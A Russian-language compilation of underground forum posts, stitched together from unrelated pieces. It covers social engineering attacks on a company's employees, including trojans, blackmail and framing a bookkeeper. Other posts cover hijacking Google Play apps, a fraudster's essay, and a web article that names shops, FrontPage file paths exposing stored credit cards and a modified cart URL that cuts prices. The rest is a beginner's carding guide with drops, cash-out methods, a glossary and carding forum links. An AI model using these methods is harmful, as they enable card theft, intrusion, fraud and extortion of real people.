Разговор о соц. инженерии можно продолжать бесконечно, но это не защитит от злоумышленников всех мастей. Среди них попадаются настолько талантливые парни, которые используют нестандартные и изощрённые методы. Типовых противодействий социоинженерам не существует. Каждая ситуация требует индивидуального подхода. Расхлябанность, халатность сотрудников и любительство потрещать в соцсетях с рабочей машины - главные дыры в системе безопасности фирмы/компании.
Многие компании, которые думают, что проблема безопасности решается просто, аппаратными и программыми средствами, заблуждаются. Технологии защиты, которым привыкли доверять - фаерволлы, средства идентификации и шифрования, системы обнаружения атак итд, малоэффективны против хакеров, использующих СИ и ОСИ (социальная и обратная социальная инженерия). Современные тех. средства защиты достигли уровня, когда на взлом затрачивается очень много времени, либо цена защищаемой инфы, меньше расходов на её добывание.
Берём реальный пример. Есть парочка знакомых ребят, которые отошли от хакерских дел, зарабатывают тем, что проводят разного рода атаки на серваки фирм, в том числе с применением СИ по заказу директоров и после дают рекомендации по защите. В одном увлекательном дельце пригласили поучавствовать
Дано: небольшая фирма, по оптовой продаже нижнего белья. Сотрудников - 22 человека, включая директора. Он же и нанял этих ребят, ввиду своей параноидальной боязни конкурентов, которые так и стремятся, любыми способами, добыть супер - пупер секретную информацию фирмы.
Два очень толковых одмина, которые не были поставлены в известность своим начальством, успешно справились и отразили все атаки. Тогда пошли другим путём, стали искать слабое звено среди сотрудников и нашли. Путём наблюдения в соцсетях и общения в дальнейшем, было выявлено несколько подходящих человек. Для установления контакта, немалую роль сыграло то, что узнали взгляды, привычки людей и многое другое, что относится к характеру. С каждым проводилась отдельная работа с индивидуальным подходом. В ход шло всё, и подлые приёмы в том числе. Имена сотрудникам я придумаю, чтоб не запутались.
Люду отловили в контактике. Разыгрался целый спектакль. Сначала к ней прицепился гадкий "тролль" который ходил следом и цеплялся ко всему. Затем, на сцену выступает "защитник", который виртуозно размазывает тролля и тот посрамлённый, исчезает с её поля зрения. Люда рассыпается спасителю в благодарностях и между ними завязывается непринуждённая переписка. Как и нужно по сценарию, у спасителя находятся общие интересы.
Хотя, в высоком искусстве, он не в зуб ногой, но Гугель в помощь! Женщина даёт свою почту, которая очень понадобилась в дальнейшем. Выбирается момент, когда Люда заходит с рабочего компа, "друг" просит её достать через свою фирму комплект именно такого белья для жены, как на картинке. К ней прикручен приватный троян.
Трусливая и осторожная Юля. Нашлось с чем подкопться и к ней - шантаж. Эта овечка разблеивала в привате, своей надёжной виртуальной подружке о своих гулянках от мужа. Опасаясь за распад семьи, она была согласна пойти на мелкое должностное преступление, которое могло вылиться в ощутимые убытки для фирмы.
Метод, рассказать всё об изменах ревнивым мужу/жене, один из распространённых. И не важно, было это на самом деле или нет. Для этого не обязательно устанавливать скрытые камеры или заниматься фотомонтажом, достаточно быть хорошим расказчиком и суметь убедить собеседника. А ревность супруга (супруги) сослужит хрошую службу. У ревнивых людей, зачастую мозги отключаются напрочь, стоит только наменуть об измене.
Наглая и хамовитая Надя... которой всё до п*ды и до дверцы. Троллингом не прошибить, мужа она на ... видала. Зацепка и у неё нашлась - 14 летняя дочь, с которой у неё серьёзные конфликты. Шантажировали тем, что расскажут девочке, что она не родная - удочерённая. Вероятность того, что ребёнок поверит постороннему, далеко не нулевая, что нанесёт глубокую душевную травму. Додавили этим и женщина дала согласие сливать полезную инфу.
Как бы не был хорош начальник, всегда найдётся кто то им недовольный. Назовём Светой. Не получилось у неё стать старшим менеджером, директор выдвинул другого сотрудника. Раз не получилось подняться на ступеньку выше, значит и зарплата осталась прежняя. Жадная Света, поколебавшись и поторговавшись, согласилась помогать "конкурентам".
А такой, как вороватый и недалёкий бухгалтер Миша, просто находка для хакеров! Этот сотрудник пригодится, когда нужно украсть деньги фирмы, не только информацию. Которого попросят о мелкой услуге, пообещав приличную сумму, угонят все деньги, часть из них, положат ему на счёт и после сообщат директору фирмы/компании, у кого искать пропавшее. И ему будет чрезвычайно трудно доказать, что он не брал и не сможет объяснить, откуда у него взялась та крупная сумма, которая была переведена за услугу. В этом случае не побежит в милицию.
Так что, кругом останется виноват. Путь денег, кто перевёл, отследить трудно, но можно. Но, такие дела проворачиваются через подставные лица. Даже будучи пойманным, хакер заявит, что он не главарь, а всего лишь исполнитель, если он оставит себе меньшую часть сворованного, эта легенда будет звучать весьма убедительно. И загремит Мишаня по полной!Вот так теперь стало модно проверять сотрудников на вшивость.
Теперь переходим к самому интересному...
ОБРАТНАЯ СИ. Это вид атаки, в которой атакующий создаёт ситуацию, где жертва сталкивается с проблемой и бежит к атакующему за помощью. Производится диверсия. К примеру, зависает жертва в рабочее время в своей любимой соцсети и вдруг не может туда зайти или в почту. Атакующий уже знаком с ней заранее, общается и позиционирует себя, как компьютерный гуру. Хоть одмином представится. Не побежит же человек с этими траблами к своему одмину, от которого может легко огрестись люлей, а попросит помочь виртуального знакомого. Он и поможет "добрыми советам", влезь туда то, выполни команды такие то и запустит с помощью жертвы троян или вирус в системе компании... Организация этого вида атаки, особенно привлекательна для атакующего.
Рассмотрим ещё несколько методов...
Этот метод атаки представляет собой адаптацию троянского коня, и состоит в использовании физических носителей. Злоумышленник может подбросить инфицированный CD, или флэш, в месте, где носитель может быть легко найден (туалет, лифт, парковка). Носитель подделывается под официальный, и сопровождается подписью, призванной вызвать любопытство.
Пример: Злоумышленник может подбросить CD, снабжённый корпоративным логотипом, и ссылкой на официальный сайт компании цели, и снабдить его надписью "Заработная плата руководящего состава Q1 2013". Диск может быть оставлен на полу лифта, или в вестибюле. Сотрудник по незнанию может подобрать диск, и вставить его в компьютер, чтобы удовлетворить своё любопытство, или просто добрый самаритянин отнесёт диск в компанию - вот, ваше валялось.
Если компания крупная, где все не знают друг друга или разные офисы в одном здании, хакер запросто может зайти в нужный кабинет с диском/флешкой и сказать
Срабатывает в крупных и не очень фирмах. Злоумышленник может позвонить по случайному номеру в компанию, и представиться сотрудником техподдержки, опрашивающим, есть ли какие-либо технические проблемы. В случае, если они есть, в процессе их "решения" цель вводит команды, которые позволяют хакеру запустить вредоносное программное обеспечение.
А еще было так, устроился разносчиком обедов. Обслуживали как раз ту компанию,
которая интересовала и как бы мимоходом общался с женщинами. В разговорах
проскакивало, жена похудела по супер методе - упражнения на видеоуроке
записаны. Полные женщины очень заинтересовались, просили скопировать диск и
пожелали купить. Вирус был внедрён, причем куплен за деньги.) Толстожопым
барышням не терпелось узреть волшебный видеоурок и поспешили зарядить диски в
рабочие машины.) Больше меня не видели...
Я ж говорил, про подлые схемы, от которых люди пострадали? Ну вот, читайте.В
результате: "слабые звенья", были уволены.Ну как то так, паскудно и говнисто.
Люди работу потеряли, и всё потому, что они стали жертвами СИ. Представляю, сколько людей кляли не свою глупость, а нашу команду. И жалко и не жалко их. Двойственное чувство. Да, хочется тупым курам по голове настучать. Кули толку то, если оно по жизни такое.
© copyright
Всем привет статьи особо не получиться но как идею думаю Вы оцените,будем угонять google play приложения,берем базы mix в моем случаи будет халява pikabu.ru кли- кай
Мне как всегда быстро повезло пиздуем в google play в поиск и быстро находим владельца приложения с учетом того что все это делал ручками,так вот сам смысл прост можно запилить чекер google play и чекать базы пачками капчи не х... нет... кли- кай
Также думаю много кто пользуеться Sqli Dumper или крузером и.т.д много сливают админок где есть логин и почта но вот чекать на google play не думали а сейчас у каждого втрого сайта есть приложения,ну дальше думаю и так понятно,угоняем почту,hijacked приложения профит :lol:
p.s это просто мои мысли понятно все требует доработки и.т.д
Привет всем. Многие из нас хотя бы раз в жизни произносили эту фразу, и я не исключение. Поэтому решила написать вам о принципе работы мошенников и о людях, которые как рыба идут к ним на крючок.
Мошенники, на самом деле, очень умные люди, умеющие войти в контакт с любым человеком, такое ощущение, что они специально изучали психологию. Они всегда хорошо выглядят, таким образом располагая к себе. Вы не встретите мошенника, который не следит за собой, так как они интеллектуально развиты и понимают, что люди всегда «встречают по одёжке». Они сразу же видят какое у вас настроение, при этом понимают как к вам лучше подойти: с напором или просто очень заинтересовать, или надавить на жалось, ведь они по сути актеры и смогут войти в любую роль.
Схемы мошенничества бывают разные, в зависимости от их жертвы и ситуации. Зачастую на уловки попадаются жадные, азартные, зависящие от чужого мнения, доверчивые и уступчивые люди. Как говорится, жадность последнего ума лишает, таких людей мошенник определяет в один миг, и ему даже не приходится подключать свои экономические знания.
Он легко может предложить бесплатный сыр в мышеловке, и они поведутся. Жадным нужен результат, в отличие от азартных. Вторые не понимают и даже не осознают, что будет дальше, главное принять участие. Я не раз в жизни встречала людей, которые не имеют своей точки зрения. Они вечно гонятся за какими-то стереотипами, модой, рекламой и не могут адекватно анализировать ситуацию.
К таким людям можно легко подойти и сказать: «А вы знаете, что все сдают деньги в фонд «antimozgi», а вы еще нет!» или «Все уже всё купили, а вы ещё думаете»? И что? Они побегут, купят и сдадут! Такими людьми легко манипулировать.
Есть категории людей, которые имеют свою точку зрения, но не могут отстоять. Они постоянно уступают и поддаются на любые уговоры. В отличии от предыдущих, они не идут за толпой, а идут за определенным авторитетом. Авторитеты для них
И теперь я вам расскажу, к чему приводит человеческая доброта и приведу самый
элементарный пример.
Добрые люди проходят мимо попрошаек на улице и всматриваются в фотографии
людей, птичек, мышек, собачек, на лечение которых просят так называемые
волонтеры. Конечно уже не секрет, что большинство из них мошенники, но
добродушным всегда очень жаль тех, кто просит о помощи. Они готовы помогать
каждому и даже не задумываются, что если они высоконравственные, и ложь для
них неприемлема, то это не значит, что мошеннику это мешает их обмануть.
На самом деле обманов очень много в жизни. С каждым годом мошенники придумывают всё больше новых афер. Поэтому, приходя в какую либо контору, мы должны сто раз убедиться в том, что нас встречает именно тот человек, который нам нужен, а не аферист, на объявление которого мы попались. Подписывая важные документы, мы должны внимательнее читать и не пропускать тексты, особенно которые написаны самым мелким шрифтом, ведь в основном именно там хранится самая важная информация. Не принимать поспешных решений. Всегда внимательно слушать и не бояться задавать вопросы.
Если вы сейчас думаете, что это всё вы и без меня знаете и не попадётесь на уловки мошенника, я хочу вас огорчить, не может человек быть компетентным во всех сферах жизни. Поэтому будьте внимательны всегда, особенно когда у вас сильные эмоции. Будь то радость, злость и т.д. Ведь именно в этот момент у вас пропадает способность трезво оценивать ситуацию.
Вы даже представить себе не можете где мошенники могут «работать». Даже на свадьбе вашей любимой племянницы…. Пока вы будете стоять, смотреть и думать какая симпатичная личность со стороны жениха, а на той стороне будут думать, что это ваш родственник, этот аферист быстро опустошит подаренные конвертики, наестся на шару и удалится, прихватив ящик дорогого коньяка.
А сейчас я поделюсь с вами случаем из своей жизни. И как я пришла в свою любимую тему ебея-наебея ... года четыре тому назад я хотела купить себе крутой велосипед. И тут случилось чудо. На сайте в ебей я нашла то, что хотела, да еще и дешево. Причем мне почему-то даже в голову не пришло что это наебей пейпала у него не было только убервайзунг, но меня это совершенно не смутило. После того, как я ему скинула деньги, он пропал, и объявление тоже. Я осталась без денег и без моей мечты.
Во мне сыграло несколько качеств: жадность, эмоции меня переполняли, и в какой-то степени я была зависима от чужого мнения, ведь уже представляла себе как я приеду на новом крутом велосипеде в нашу велокомпанию, и все ахнут. Оказалось, что все не так, как я себе это нарисовала. Но зато навело на мысль вернуть утраченное за счет тех, кто так же поддаваясь эмоциям готов расстаться с деньгами легко и просто. Причем в данном случае полученный мною урок привел меня к тому, что этот способ стал основной статьей моего дохода последние несколько лет.
В конце Вам скажу несколько поговорок, которые вы всегда должны помнить:
1.Не тот жаден, у кого мало, а тот, кто хочет большего.
2.Азарт есть всегда, не всегда есть фарт.
3.Доброму и сухарь на здоровье, а злому и мясное не впрок.
4.Не знаешь броду - не лезь в воду.
5.В человеке важен не чин, а начин.
6.Будьте всегда внимательны. Доверяйте, но проверяйте
Желаю Всем удачи на просторах нашей нелегкой шулерской деятельности!
С любовью к своему делу.
© copyright
Социальная инженерия, как основа SMM
Социальная инженерия является одним из подразделов социальной психологии, а точнее – социального программирования. На сегодняшний день, интернет-реклама вобрала в себя лучшие методики из этой науки, позволяя добиваться поставленных целей в увеличении продаж или узнаваемости бренда Вашего бизнеса. Продвижение сайтов с помощью SMM (Social Media Marketing) также использует в своей основе социальную инженерию.
Она подразделяется на два основных вида: непосредственно, сама социальная инженерия и обратная социальная инженерия.
Задача социальной инженерии в SMM – заставить человека совершить именно то действие, которое требуется испытателю.
Технология работает по следующей схеме:
Эту технологию можно применить в любой обстановке, а объекты, на которых она была направлена – так и останутся в неведении настоящей ситуации. Единственный недостаток – «социальный инженер» (манипулятор), зависит от людей, на которых направлена социальная инженерия. Поэтому этот процесс воздействия совершенно не контролируем, а его успешность зависит от множества факторов.
Изначально обратная социальная инженерия применялась хакерами для получения закрытой информации. Для этого хакер применял следующие техники:
Диверсия. Создание обратимой неполадки на компьютере «жертвы» – это
может вирусная атака, подсылка «троянов» и многое другое;
Реклама. Злоумышленник подсовывает «жертве» объявление в духе «если
возникли неполадки с компьютером, позвоните по такому-то номеру». После того,
как жертва позвонит по указанному номеру, она, как правило, сама сообщает
хакеру все свои пароли и данные.
Технология использует привычку человека ставить одинаковые пароли, как от
личных, так и от корпоративных данных.
Таким образом, хакер может получить все нужные данные организации, не затрачивая особых усилий.
Click to expand...
Стратегическая задача обратной социальной инженерии – подтолкнуть человека к нужным нам действиям. При этом её существенное отличие от другого вида социальной инженерии заключается в том, что мы полностью контролируем ситуацию в течение всего времени «эксперимента».
Этот метод также значительно зависит от таргетинга – выбора именно той аудитории, которая отреагирует на информации о продвигаемой продукции. Для этого необходимо тщательно изучить потенциального покупателя – узнать его пристрастия, его возраст, стереотипы мышления, страхи и т.д. После этого мы провоцируем ситуацию, при которой человек (или сообщество людей) вынуждены обратиться к нам за нашей же помощью.
Главные постулаты обратной социальной инженерии:
Разбираем дальше уязвимости систем электронной коммерции. Начнем со сладкого,
а именно с сс. Незадачливым администраторам интернет-магазинов уже давно
следовало бы понять, что файлам, хранящим критическую информацию (пароли,
номера
кредитных карт, и т.д.), совсем не место в открытых для всеобщего просмотра
веб-директориях, даже если об этих файлах никто, кроме самого админа не знает.
Примером такого головотяпства, является ---www.swimmingcoach.org ,
администратор
которого хранит данные о кредитных карточках своих клиентов в текстовых файлах
директории /_private/, будучи уверенным в том, что о их существовании знает
только он один. Так бы и было, если бы не всеми любимый Microsoft, со своим
величайшим творением всех времен и народов - FrontPage, который сыграл в этом
случае злую шутку. Ее смысл в том, что в некоторых файлах FrontPage хранит
информацию о всех файлах веб-сервера и, что самое главное, файлах, в которые
выводятся и сохраняются результаты обработки данных. О дним из таких файлов
является writeto.cnf, расположенный как правило в
--- http://www.xxx.org/_vti_pvt/writeto.cnf.
Вот какую информацию предоставляет скачанный writeto.cnf с сервера
www.swimmingcoach.org (именно скачанный, в браузере ты его не откроешь):
-----
_private/sic7result.txt: collegesTiJimming/sicS.htm fpdb:global.asa
collegesTiJimming/sicS.asp salary.asp
_private/Jobsvc_net.txt:jobservice/job_net_questions.htm
_private/audio_sales.txt:worldclinic/ASCA99/asca99_audio.htm
_private/survey.txt:jobservice/salary.htm _private/Mc2000_registration. txt:
Tijorldclinic/asca2000/asca2000_packets . htm
_private/form_results.txt:jobservice/02salary.htm
_private/article_results.txt:ALTST/past_articles/altst_4.htm
ALTST/past_artide;
pbsurvey.txt:water_depth_rule_questionnaire.asp
_private/cert_up.txt:forms/certupgrade.htm
_private/Mcreg2002_results.txt:worldclinic/ASCA2002/registration2.htm
worldclin:
_private/emembers.txt:articles/9903/9903-4.htm articles/9903/9903-5.htm
article;j _private/jobsvc_net.txt:jobservice/job_net_questions.htm
_private/certificaion_orders.txt:ASCA_Catalog/certification_0rder.htm
_private/ameridome_leads.txt:ameridome/ordering.htm
_private/feedbackl.txt:forms/feedback.htm
_private/bkcatalog.txt:ASCA_Catalog/catalog.htm
ASCA_Catalog/images/catalog.htm
_private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
_private/sicSresult.txt:sicS/default.htm
_private/sescc_reg.txt:forms/STiJscc_reg.htm
_private/chevron.txt:forms/chevform.htm
_private/sicord.txt:ASCA_Catalog/sicord.htm
_private/samonth.txt:forms/samonth.htm
_private/altst_jоin.txt:ALTST/ALTST_Join.htm learning_center:global.asa
SurvivalKIT:survivalkit.asp
-----
Как ты видишь, результаты выводятся в текстовые файлы emembers.txt,
survey.txt,
sicSresult.txt лежащие в директории /_private/. Остается всего лишь открыть их
в
браузере и сохранить те, в которых лежат кредитки.
Кроме этого, ту же информацию можно получить и из другого файла на этом
сервере
author.log, расположенного в директории /_vti_log/. Он большой, так что
придется
запастись терпением.
Следующим сайтом который подвергнется нашему разбору, будет www.maledicta.com.
В одной из прошлых статей мы говорили о манипуляции ценой в торговых тележках.
www.maledicta.com дает нам еще один пример такого действия. Скрипт тележки
quikstore.cgi (в прошлом - бажный) в данном случае обрабатывает запросы
методом
POST, так что для изменения цены товара придется воспользоваться утилитой
Achilles, скачать которую ты можешь с нашего сайта - lwb57.webmen.ru.
С ее помощью ты увидишь строку запроса вот такого вида:
-----
item-
BEQUGODU%7C14.95%7CEquinox+of+the+Gods%7CNA%7CNA=1&store_type=html&page=c[ + ]
[ + ]rowley.html&add_to_cart.x=45&add_to_cart.y=14
-----
Конечно, если выберешь книгу Алистера Кроули (Сrowley), на мой взгляд,
единственного мистика, достойного прочтения.
Как ты, наверное, уже успел заметить, что цена товара передается в строке
запроса
"14.95", с помощью Achilles ты можешь теперь ее изменить и передать серверу.
А можешь просто передать запрос в строке браузера.
Так выглядит изначальный запрос:
---
[http://www.maledicta.com/cgi-
bin/quikstore...14.95%7CEquinox](http://www.maledicta.com/cgi-
bin/quikstore.cgi?item-BEQUGODU%7C14.95%7CEquinox)[ + ]
[ +
]+of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45[
А так модифицированный:
---
[http://www.maledicta.com/cgi-
bin/quikstore...0.95%7CEquinox+](http://www.maledicta.com/cgi-
bin/quikstore.cgi?item-BEQUGODU%7C0.95%7CEquinox+)[ + ]
[ +
]of+the+Gods%7CNA%7CNA=1&store_type=html&page=crowley.html&add_to_cart.x=45&[
Приятных чтений на ночь;-).
Eat The Rich!
Copyright 2002-2004 by LwB Security Team. All rights reserved.
З,Ы, из первого шопа до сегодня можно креды дергать, привда без cvv2
Статья для начинающих кардеров. Как и где зарабатывать в сети. Начинающим кардерам посвящается
Для новичка в деле кардинга есть два начальных пути, которые во многом
определяют его дальнейший авторитет и развитие:
1. Путь риппера – самый простой по началу - путь кидания «честных
кардеров» на карты или вмз. Сразу определяет негативное
отношение к самой особе кидалы.
2. Путь «честного кардера» - путь требующий достаточных знаний в
области хака и социальной инженерии.
Как человек прошедший оба эти пути хочу описать каждый из них
достаточно подробно, рассмотрев все их плюсы и минусы.
Путь риппера.
Рипперами обычно становятся неопытные, и мало знакомые с самим
кардингом, как таковым молодые люди (большинство просто дети).
Малолетнего неопытного кидалу легко опознать по новозареганному 9-
тизнаку, и определенно по его детской речи. Но также существуют в сети
несколько экземпляров профессиональных, хорошо организованных
рипперов, к примеру известный на многих кардерских порталах человек
под ником BAO (этого скорее можно отнести в раздел ОЧЕНЬ хорошо
организованных рипперов, нежели к професиональным). Основным
инструментом кидалы является социальная инженерия – 100% проверено
что от хитрого и бывалого кидалы не спасают никакие меры, включая
даже гарантов.
Первые шаги
Первое, чем я занялся когда решил попробовать себя но поприще
рипперства (надо сказать к тому времени я уже был достаточно неплохим
синжером) это продажа обычных карт с cvv кодом. Для этого я нашел на
одном из форумов продавца карт и сделал ему «суперпредложение»,
сказав ему что хочу купить 7000 карт usa с cvv. Разумеется ни один
продавец не отказался бы от такого заказа (взыграла одна из главных
ниточек управления синжера - жадность), и сказал что готов продать мне
их. Я для порядка поломался немного, сбил немного цену и попросил у
него 100 штук на проверку, убедив его что я буду постоянным и
выгодным покупателем. Получив свои 100 халявных карт ушел в
оффлайн и сменил аську (на asechka.ru продаются обычные 6-тизнаки по
1 вмз за штуку).
Легкие деньги
Вторым серьезным желанием стало желание обогатиться =). Т.к. честно
стыренных карт было уже достаточно много (~600 шт.), я решил
разводить людей уже на деньги. Это оказалось несложно, я предлагал
людям купить огромные базы за смешные деньги (первая сделка была -
3000 карт за 180 вмз, при минимальной «рыночной» цене – 1.5 вмз за
штуку) и предлагал на проверку те карты, добытые на халяву. Таким
образом я срубил около 600$ за 2 месяца.
Эволюция
Потом простые карты с cvv кодом уже перестали меня интересовать, т.к.
были дешевы и не приносили особой прибыли. Следующей ступенью
была продаж карт с full info и enroll. Тут я заработал еще около 200$, но
дело как-то не шло, и я решил заняться чем-нибудь другим – более
прибыльным. Я решил «продавать» карженую технику. Знаете сайт
carderproduct.org? Вот это и есть самые настоящие кидалы. Я работал
более скромно но все же неплохо рубил бабла на этом. Особенно хорошо
расходились телефоны nokia 6600 и нубуки =). Тут существует много
способов развести человека, но для всех них нужно иметь неплохой опыт
в синженерии. Важно представить себя как серьезного продавца и
показать что ты не собираешься идти на уступки и доказать покупателю
что это в его интересах чтобы ты с ним работал. Можно наоборот
показаться глупым ламером и делать очень много уступок, а потом когда
человек расслабиться незаметно предложить ему свою незначительную с
виду идею, которая тем не менее позволит провернуть твой грязный
замысел =).
Заключение.
Малолетние рипперы – жалкие, презренные люди, достойные только
сожаления, готовые за 5 баксов из тебя душу вытрясти своими
неумелыми попытками тебя кинуть. Рипперы профессиональные лично
мне внушают только уважение, как отличные синжеры (хотя надо сказать
этому таланту можно было бы найти и лучшее применение).
Плюсы:
? ненужно много ума
? достаточно безопасно
? можно заработать неплохие деньги (200 – 300$ в месяц)
Минусы:
? отрицательное отношение со стороны нормальных кардеров
Пост скриптум
В период работы с енроллом я понял что на нем можно неплохо
заработать никого не кидая и, найдя дропа, начал его налить.
Путь кардера.
Про это написано уже много статей, так что я не буду повторять их а
просто напишу кое-что упущенное в них, либо исправлю морально
устаревшие ошибки этих статей.
Для человека решившего стать нормальным кардером необходимо иметь
неплохую базу в плане хакинга. Во многих старых статьях «для
начинающих кардеров» писали о взломе инет-шопов через Гугл, юзая
примитивные багги php/perl inlude. Сейчас такое уже не проходит, или
проходит тока с самыми захиревшими шопами в которых вряд ли есть что
нибудь полезное. Можно для начала посоветовать где-нибудь достать
(купить) базу хостера – там наверняка есть парочка шопов. В конце
концов можно просто просканить сервак шопа на предмет уязвимых
сервисов и ломануть его каким-нибудь публичным или приватным
эксплойтом. Так можно достать карты. Далее их можно продавать, что
дает небольшой но стабильный доход, а главное – это достаточно
безопасно. Далее можно использовать карты для закупки в инет шопах
(разумеется заказывать не на себя – для этого есть дропы). Если у тебя
появиться карты с full info, то их можно использовать для онлайн доступа
(заенроллить) и управлять счетом кардхолдера через инет; возможно
осуществлять операции перевода на другие счета и т.п., но это чревато
прозвоном из банка, который требует во-первых неплохого знания
английского, а во-вторых опять навыка синженерии. Можно заказать себе
так называемый «белый пластик» и пойти шопиться в реальных магазах.
Плюсы:
? можно заработать очень много денег
? можно продуктивно сотрудничать с другими кардерами
Минусы:
? достаточно небезопасно
? новичку изначально нужны неплохие знания в области хакинга
Заключение.
Я не призываю народ заниматься кардингом. Эта статья написано
исключительно для ознакомления и обезопасивания себя, а также просто
как публицистический рассказ =).
Краткий кардерско-русский словарь.
CC, картон, карты – кредитные карты или информация о них.
Фрауд (fraud) – незаконная операция. Со всеми вытекающими отсюда
последствиями.
Кардхолдер (cardholder) – владелец карты
CVV/CVV2/CVN код – три-четыре цифры, улучшающие защиту карт при
оплате через интернет. Теперь карты без этого кода практически нигде не
принимаются.
Чекать карты (проверять на валидность) – проверка кредитных карт на
работоспособность. Кредой могли воспользоваться до тебя, из-за чего
кардхолдер мог ее заблокировать и, следовательно, сделать по ней уже
ничего нельзя. Поэтому креды стоит брать у проверенных продавцов или
где-то проверять. Проверка обычно заключается в съеме с карты
минимально возможной суммы (около 10 центов). Если снять удалось,
значит, креда рабочая, и ее надо срочно куда-нибудь вбивать. Проверять
лучше через спецпрограммы или в специальных местах. На порносайтах
чекать не советую, так как именно там они и убиваются.
Вбивальщик – человек, который знает, как правильно купить товар в е-
магазине или аккаунт на порносайте, так чтобы при этом не появилось
сообщение transaction declined.
Вещевой кардинг – одна из разновидностей кардинга, заключается в
покупке реальных вещей по украденной креде. Обычно это бытовая
техника, так как потом ее можно продать. А продавать надо, потому что,
во-первых, ее очень сложно ввезти в Россию, а во-вторых – никому не
нужны дома вещественные доказательства. Продажей может заниматься,
например, иностранный дроп.
Дроп (от англ. drop – бросать) – человек, на которого «скидываются»
наличные, чеки или товары, заказанные в магазине, которые он потом
передает своему нанимателю. Дроп может и не знать, что приобретено
все не совсем честным способом. Или наоборот, заниматься этим
профессионально.
Вайер (wire transfer) – банковский перевод. Идет долго, но надежно.
Весьма вероятен и чарджбэк, если деньги краденые.
Чарджбэк (money back) – отзыв денег. Делают интернет-магазины, банки,
электронные системы платежей. Производится, когда жертва кардинга
заявляет, что ее обокрали. Поэтому в кардинге большое значение
придается отмыву и обналичке денег.
Money orders или Cashier Checks – чеки, которые заранее оплачены. Из
всех видов чеков эти - самые удобные для кардеров. С остальными
приходится долго возиться: посылать их на проверку в другой банк и
заполнять кучу бумаг. А эти чеки не требуют такого напряжения, правда
и комиссионный процент у них очень неслабый.
Транзакция – операция по карте, начинающаяся с идентификации
кардхолдера и до момента выдачи денег.
Палка – PayPal, система электронных платежей (типа наших WebMoney).
Существенное отличие в том, что туда можно переводить деньги с креды.
Правда, делать это становится все труднее и труднее - организуются
лимиты ввода, лимиты вывода и еще много разных ограничений.
Нальщик – человек, который помогает перевести деньги в наличность.
Допустим, к тебе пришел чек. Отдаешь его нальщику – получаешь
наличность. Нальщики не налят креды! В основном они работают с
чеками, банковскими вайерами, денежными переводами.
Эскроу-сервисы (escrow services) – конторы, которые играют роль
гарантов при работе с аукционами. Ты им отсылаешь деньги, ЭС
сообщает продавцу, что деньги есть, и он (продавец) отсылает товар.
Получив его, ты сообщаешь об этом, и деньги уходят продавцу.
Белый пластик – это не пластик от элитных производителей, как мне
однажды заявил «гуру» кардинга, а просто белый кусок пластика (обычно
марки CR-80) с пустой магнитной полосой. Похож на CD-болванку, и на
него тоже можно записать много интересного
.
Дамп – информация, записанная на магнитной полосе кредитной карты.
Обычно состоит из 2 или 3 треков.
Трек (дорожка) – кусок информации, записанный на карте. Всего на
карте их 3. Первый – инфа о владельце, второй – инфа о владельце, о
банке и др., третий – запасной или для дополнительной информации.
Самый важный - это второй трек. Третий нам не интересен, так как
ничего ценного собой не представляет.
Эмитент пластиковой карты (card issuer) – контора, которая выдала
карту. Это может быть банк, магазин (дисконтная карта) и др. Мы будем
говорить о банковских кредитных картах, поэтому в качестве эмитентов
будем рассматривать банки.
BIN (Bank Identification Number) – первые несколько цифр номера карты,
которые указывают на банк-эмитент. Обычно это первые шесть цифр.
Если банк очень крупный, достаточно и первых трех цифр.
Банк-эквайер (acquirer) – банк, отвечающий за первичную обработку
тразакций. То есть, сначала он работает с твоей кредиткой, магазинами, в
которых ты отовариваешься, банкоматами, в которых ты получаешь
деньги. Именно он распространяет стоп-листы.
Авторизация – процесс проверки наличия средств на счете у клиента.
Мерчант аккаунт (merchant account) – специальный счет в банке,
который открывается продавцом, чтобы снимать деньги с карт-счетов.
Например, решил ты принимать оплату кредитными картами. В банке
открываешь такой счет, и на него поступают деньги от покупателей.
Чтобы тебе не ждать, пока перейдут деньги с карт-счета, банк платит тебе
из своего кармана, а сам ждет тех денег. Поэтому, чтобы открыть такой
счет, нужно просто излучать уверенность, что твой ларек завтра не
обанкротится.
Эмбоссер – аппарат, который выдавливает инфу на картах. Обращал
внимание, что на кредитках буквы не нарисованы, а как бы выдавлены?
Этим и занимается эмбоссер.
Энкодер (ридер) – девайс для чтения и записи инфы с магнитной полосы
кредитки.
ATM (Automatic Teller Machine) – банкомат.
Импринтер – устройство, которое печатает на слипе данные,
эмбоссированные на карте, и данные о точке, на которой расположен
импринтер.
ПОС-терминал (point-of-sale terminal) – устройство, установленное в
магазинах. Считывает инфу, записанную на магнитной полосе, и
связывается с банком для проведения транзакции. В отличие от
банкомата, ПОС-терминал управляется кассиром. В большинстве случаев
идентификация покупателя является визуальной, то есть кассир не
спрашивает пин-код или удостоверение личности. Это не касается
нескольких видов карт, требующих полной авторизации и идентификации
при использовании.
Ссылки.
http://forum.mazafaka.cc/ - так называемая «маза». Очень популярный
кардерский форум. Много проверенных людей и приятная в общении
администрация.
http://www.xakepy.ru/forumdisplay.php?f=19 – портал в основном
посвященный хакингу, но также есть раздел Carding.
http://www.xakep.ru/magazine/xs/036/ - спец. выпуск журнала ][акер,
посвященный кардингу. 80% написанного – фуфло, но чисто для
ознакомления подойдет.
http://forum.thecc.us/ - еще один кардерский форум.
http://www.wmmoscow.com/ - без WebMoney кардеру никуда =). А вот
здесь их можно анонимно обналичить.
Статья была предоставлена мне (antiox'у) sm00ch'ем для её последующей публикации в EXEC-zine..
Всем привет вообщем статья не о чем но надо как-то борд качать и флудить задался сегодня таким вопросом как угнать виртуальный номер по ru это давно баян снятый ещё в далеком 2015г вот видео тыц мне стало интересно другие страны us,de и.т.д но сразу столкнулся с такой проблемой как определить,какой компании принадлежат эти самые виртуальные номера,терпилай был выбран данный сервис receive-sms-free.com кли- кай
Googl молчал сука упорно как пробить и не хотел мне помогать но через час не выдержал,да и кто выдержит две тысячи запросов в час привел меня сюда textmagic.com кли- кай.Вообщем чекнул почти все номера Twilio но германия оказался сотовый,думаю многие сейчас задумались кто вбивает и пользуется виртушками по чему парой не получается вбить или где-то зарегаться на данные номера,антифрод рулит,получили вообщем не плохой чекер сотовых. кли- кай.
Подведем итог и так данный сервис видит номера 230-стран,может определить тип телефона,думаю кардеры это оценят и будут учитывать что шоп может видеть также какой номер они вбивают.... кли- кай
